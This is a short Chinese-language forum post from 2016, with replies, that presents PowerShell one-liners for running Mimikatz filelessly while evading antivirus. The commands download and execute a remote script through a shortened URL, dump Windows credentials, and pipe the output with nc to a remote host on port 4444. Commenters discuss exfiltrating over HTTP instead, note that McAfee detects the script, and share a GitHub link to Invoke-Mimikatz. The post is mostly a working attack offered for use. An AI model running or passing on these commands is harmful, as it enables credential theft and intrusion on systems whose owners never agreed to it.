powershell加载mimikatz 抓密码 (无文件,躲过杀软,可以nc回显) 20160715

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" | nc 192.168.1.1 4444 

其实我觉得可以考虑http回显。 

然后查看http日志。 

 

视频下载:https://yunpan.cn/cB5T9cAP5QF9T  提取码:97fb

收藏 感谢(0)
分享到: 0
6 个回复
  1. 1# F1uYu4n   |  2016-07-15 10:38

    windows一般哪有nc给你用

  2. 2# 陆由乙 (admin'OR'a'='a)   |  2016-07-15 11:11

    @F1uYu4n 额,那就http回显。

  3. 3# Hogns (这家伙还没有成为任何领域的领主)   |  2016-07-15 12:09

    这个脚本这几天刚被杀。。一上传就被干了。
    杀软:麦咖啡

  4. 4# 娃哈哈 (科学家)   |  2016-07-15 13:20

    无法连接到远程服务器

  5. 5# YY-2012 (#)(#)   |  2016-07-15 13:20

    可以

  6. 6#
    回复此人  感谢
    陆由乙 (admin'OR'a'='a)   |  2016-07-15 13:26

    @娃哈哈 https://raw.githubusercontent.com/Tu-tu-tu/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 zg

你可能感兴趣的:(powershell)